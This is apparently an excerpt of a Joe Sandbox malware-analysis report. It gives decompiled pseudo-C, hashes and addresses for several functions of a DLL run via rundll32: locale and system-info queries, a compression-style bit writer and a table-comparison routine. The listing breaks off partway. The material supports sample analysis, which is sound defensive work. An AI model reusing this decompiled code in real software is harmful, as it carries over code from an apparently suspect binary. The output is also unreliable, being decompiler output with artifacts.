Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
Instruction ID: 99f10fc073ecf109e24ac13ca0acd49dcb2bbe1fdf15cb55e50fbcb3f53cae0e
Opcode Fuzzy Hash: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
Instruction Fuzzy Hash: 54F0B4B1A40712AEE720DB709C06B4B77D4DF10B55F10C429EAD5DE1C1E7B0D4844791

Uniqueness

Uniqueness Score: -1.00%

Function 1000FFF2 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FFF2(void* __ecx, void* __edx) {
				char _v16;
				void* _t4;
				short _t8;
				void* _t9;
				void* _t17;
				void* _t19;

				_t17 = __edx;
				_t9 = __ecx;
				_t4 = E1000D389(__edx);
				GetLocaleInfoA(0x32, 9,  &_v16, 4);
				_t2 = _t9 + 0x400; // 0x400
				E100119CD(_t17, _t4, _t19, _t2);
				_t8 = 0x14;
				 *((short*)(_t9 + 0x420)) = _t8;
				return _t8;
			}

0x1000fffb
0x1000fffd
0x10010000
0x10010012
0x10010018
0x10010023
0x1001002b
0x1001002e
0x10010037

APIs

GetLocaleInfoA.KERNEL32(00000032,00000009,10002D8F,00000004,00000000,00000000,00000424,10002D8F,00000000), ref: 10010012

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
Instruction ID: 1892679a08907ef3746c90150a7bae5dd7f49ea90dce8a51ef2b7239b0e12dfa
Opcode Fuzzy Hash: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
Instruction Fuzzy Hash: BCE092763402043AE704A699A886FBB379CDB84664F14012AFB09DF1C2E9F06C4182B5

Uniqueness

Uniqueness Score: -1.00%

Function 1000AFB9 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AFB9(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x1000afc1
0x1000afcc
0x1000afd7
0x1000afc3
0x1000afc5
0x1000afc7
0x1000afc7

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000B44C,?,?,00000001), ref: 1000AFCC

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
Instruction ID: 22c7fc0e0940038590920ac71496bdb1d1527b7a0f48138a502887aeb48b8403
Opcode Fuzzy Hash: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
Instruction Fuzzy Hash: 2EC0226160020E46DF0097A266066BA72EC4B08289F100062EC03F00C0E560DC8042A0

Uniqueness

Uniqueness Score: -1.00%

Function 100194D0 Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E100194D0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8ac9b60f
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x159850f
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x159
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xff4d88c8
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0xfff4d88
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8ac9b60f
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0xfff4d88
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x80000002
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x850f8000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xff4d88c8
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8ac9b60f
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8ac9b612
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xff4d88c8
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x6af0458d
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x458d2374
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8ac9b60f
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xff4d88c8
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8ac9b60f
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xf981f055
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8ac9b60f
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x2f981
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xff4d88c8
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0xfff4d88
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8ac9b60f
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8ac9b611
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0xfff4d88
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8ac9b60f
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x6af0458d
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xff4d88c8
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8ac9b60f
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x100194d3
0x100194da
0x100194de
0x100194e0
0x100194e2
0x100194e8
0x100199d5
0x100199db
0x100194ee
0x100194fa
0x10019507
0x1001950a
0x10019511
0x10019514
0x10019517
0x1001951a
0x1001951b
0x1001951e
0x10019524
0x10019527
0x1001952c
0x1001953c
0x1001953e
0x100195f4
0x10019783
0x10019783
0x1001978c
0x1001989f
0x1001989f
0x100198a6
0x100198a6
0x100198af
0x100198bc
0x100198c5
0x100198c8
0x100198cd
0x10019915
0x100198cf
0x100198cf
0x100198d2
0x100198d9
0x100198df
0x100198e2
0x100198e5
0x100198e8
0x100198eb
0x100198ee
0x100198f4
0x10019902
0x10019905
0x10019908
0x10019911
0x10019911
0x10019918
0x1001991b
0x10019921
0x10019928
0x1001992e
0x1001997c
0x10019988
0x1001998f
0x10019930
0x10019930
0x10019933
0x1001993c
0x1001993f
0x10019942
0x10019949
0x1001994c
0x1001994f
0x10019952
0x10019955
0x1001995b
0x10019966
0x1001996c
0x10019973
0x10019973
0x00000000
0x1001992e
0x10019792
0x10019792
0x10019799
0x10019799
0x100197a2
0x100197af
0x100197b8
0x100197bb
0x100197c0
0x100197c2
0x100197c5
0x100197cc
0x100197d2
0x100197d5
0x100197d8
0x100197db
0x100197de
0x100197e1
0x100197e7
0x100197f5
0x100197fb
0x100197fe
0x10019801
0x10019801
0x10019804
0x10019806
0x10019809
0x1001980f
0x10019816
0x1001981c
0x10019875
0x10019875
0x10019878
0x10019878
0x1001987e
0x10019886
0x10019893
0x1001981e
0x1001981e
0x10019829
0x1001982c
0x1001982f
0x10019832
0x10019839
0x1001983c
0x1001983f
0x10019842
0x10019845
0x1001984b
0x10019857
0x1001985c
0x10019869
0x10019869
0x00000000
0x1001981c
0x100195fa
0x100195ff
0x10019605
0x10019605
0x1001960d
0x1001960d
0x10019615
0x10019615
0x1001961d
0x1001962a
0x10019633
0x10019638
0x1001967d
0x1001967f
0x1001963a
0x1001963a
0x1001963d
0x10019640
0x10019647
0x1001964a
0x1001964d
0x10019650
0x10019653
0x10019659
0x10019667
0x1001966d
0x10019676
0x10019679
0x10019679
0x10019682
0x10019685
0x1001968b
0x1001968b
0x10019692
0x10019692
0x10019699
0x10019699
0x100196a1
0x100196a1
0x100196a8
0x100196b5
0x100196be
0x100196c1
0x100196c6
0x100196c8
0x100196cb
0x100196d2
0x100196d8
0x100196db
0x100196de
0x100196e1
0x100196e4
0x100196e7
0x100196ed
0x100196fb
0x10019701
0x10019704
0x10019707
0x10019707
0x1001970a
0x1001970c
0x1001970f
0x10019715
0x1001971c
0x10019722
0x1001977b
0x1001977b
0x00000000
0x10019724
0x10019724
0x1001972f
0x10019732
0x10019735
0x10019738
0x1001973f
0x10019742
0x10019745
0x10019748
0x1001974b
0x10019751
0x1001975d
0x10019762
0x1001976f
0x00000000
0x1001976f
0x10019544
0x1001954a
0x1001954d
0x10019550
0x10019550
0x10019553
0x10019553
0x10019559
0x10019559
0x10019561
0x10019566
0x10019573
0x1001957c
0x1001957f
0x10019584
0x100195cc
0x10019586
0x10019586
0x10019589
0x10019590
0x10019596
0x10019599
0x1001959c
0x1001959f
0x100195a2
0x100195a5
0x100195ab
0x100195b9
0x100195bc
0x100195bf
0x100195c8
0x100195c8
0x100195d2
0x100195d8
0x100195db
0x100195e2
0x100195e2
0x10019995
0x10019995
0x10019998
0x1001999a
0x1001999f
0x100199ae
0x100199ba
0x100199bf
0x100199bf
0x100199b0
0x100199b0
0x100199b5
0x100199b5
0x100199b5
0x100199a1
0x100199a1
0x100199a6
0x100199a6
0x100199a6
0x00000000
0x1001999f
0x1001953e
0x10019533
0x10019536
0x100199c4
0x00000000
0x100199c4
0x00000000
0x100199c7
0x100199c7
0x100199cb
0x100199cb
0x100199cb
0x00000000
0x10019514

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 214d7a17fbbeb721b2fc272fa8e13e03def7007dcfd9fc1c1e1a72706350d461
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: 7AF14C755092518FC709CF19C4948FA7BF1EFA9310B1E82FDD8899B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10003EEA Relevance: .2, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10003EEA(void* __fp0) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr* _t122;
				char _t127;
				char _t151;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t175;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				char* _t186;
				void* _t202;
				void* _t203;
				signed int _t208;
				char _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				char _t214;
				char _t215;
				intOrPtr* _t216;
				void* _t217;

				_t260 = __fp0;
				_t122 = E10009525(0x20);
				_t216 = _t122;
				if(_t216 == 0) {
					return _t122;
				}
				_v12 = 0;
				_v5 = 0;
				_t208 = E1000BF58( &_v5);
				_v16 = _t208;
				if(_t208 != 0) {
					_t222 = _v5 - 5;
					if(_v5 == 5) {
						_t8 = _t216 + 0xc; // 0xc
						_t9 = _t216 + 8; // 0x8
						_t10 = _t216 + 4; // 0x4
						E10003C58(_t208, _v12, __fp0, _t216, _t10, _t9, _t8);
						_t217 = _t217 + 0x10;
					}
				}
				E1000953B( &_v16, _v12);
				_v12 = 0;
				_t127 = E1000198C(0x187);
				_push(0x187);
				_v16 = _t127;
				_t175 =  *0x10020d88; // 0x4a1fc98
				_t16 = _t175 + 0x224; // 0x10000000
				_t209 = E10010796( *_t16, _t127, _t222, _t260,  &_v12);
				_v24 = _t209;
				E1000A27E( &_v16);
				if(_t209 != 0) {
					_t151 = E1000198C(0x154);
					_push(0x154);
					_v16 = _t151;
					_t214 = E10010133(_v12, _t151);
					_t186 =  &_v16;
					_v20 = _t214;
					E1000A27E(_t186);
					if(_t214 != 0) {
						_push(_t186);
						_t215 = E10010133( *((intOrPtr*)(_t214 + 0x428)), 0);
						_v16 = _t215;
						if(_t215 != 0) {
							_t27 = _t216 + 0x1c; // 0x1c
							_t28 = _t216 + 0x18; // 0x18
							_t29 = _t216 + 0x14; // 0x14
							_t31 = _t216 + 0x10; // 0x10
							E10003C58( *((intOrPtr*)(_t215 + 0x424)),  *((intOrPtr*)(_t215 + 0x428)), _t260, _t31, _t29, _t28, _t27);
							E100104E3( &_v16);
						}
						E100104E3( &_v20);
					}
					E1000953B( &_v24, _v12);
				}
				if( *((intOrPtr*)(_t216 + 4)) <= 0) {
					L29:
					if( *((intOrPtr*)(_t216 + 0xc)) <= 0) {
						L48:
						return _t216;
					}
					_t165 = 0;
					_t202 = 0;
					_v12 = 0;
					do {
						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
							L39:
							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
								goto L47;
							}
							_t211 = 0;
							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
								goto L47;
							}
							_t178 = 0;
							do {
								_t166 =  *((intOrPtr*)(_t216 + 8));
								if( *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t202 + _t166 + 4)) &&  *((intOrPtr*)(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t202 + _t166 + 8))) {
									 *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
								}
								_t211 = _t211 + 1;
								_t178 = _t178 + 0x24;
							} while (_t211 <  *((intOrPtr*)(_t216 + 0x1c)));
							_t165 = _v12;
							goto L47;
						}
						_t210 = 0;
						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
							goto L39;
						}
						_t179 = 0;
						do {
							_t167 =  *((intOrPtr*)(_t216 + 8));
							if( *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t202 + _t167 + 4)) &&  *((intOrPtr*)(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t202 + _t167 + 8))) {
								 *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
							}
							_t210 = _t210 + 1;
							_t179 = _t179 + 0x24;
						} while (_t210 <  *((intOrPtr*)(_t216 + 0x14)));
						_t165 = _v12;
						goto L39;
						L47:
						_t165 = _t165 + 1;
						_t202 = _t202 + 0x24;
						_v12 = _t165;
					} while (_t165 <  *((intOrPtr*)(_t216 + 0xc)));
					goto L48;
				} else {
					_t168 = 0;
					_t203 = 0;
					_v12 = 0;
					do {
						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
							L20:
							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
								goto L28;
							}
							_t213 = 0;
							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
								goto L28;
							}
							_t180 = 0;
							do {
								_t169 =  *_t216;
								if( *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t203 + _t169 + 4)) &&  *((intOrPtr*)(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t203 + _t169 + 8))) {
									 *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
								}
								_t213 = _t213 + 1;
								_t180 = _t180 + 0x24;
							} while (_t213 <  *((intOrPtr*)(_t216 + 0x1c)));
							_t168 = _v12;
							goto L28;
						}
						_t212 = 0;
						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
							goto L20;
						}
						_t181 = 0;
						do {
							_t170 =  *_t216;
							if( *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t203 + _t170 + 4)) &&  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t203 + _t170 + 8))) {
								 *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
							}
							_t212 = _t212 + 1;
							_t181 = _t181 + 0x24;
						} while (_t212 <  *((intOrPtr*)(_t216 + 0x14)));
						_t168 = _v12;
						goto L20;
						L28:
						_t168 = _t168 + 1;
						_t203 = _t203 + 0x24;
						_v12 = _t168;
					} while (_t168 <  *((intOrPtr*)(_t216 + 4)));
					goto L29;
				}
			}

0x10003eea
0x10003ef5
0x10003efa
0x10003eff
0x10004168
0x10004168
0x10003f0e
0x10003f11
0x10003f19
0x10003f1b
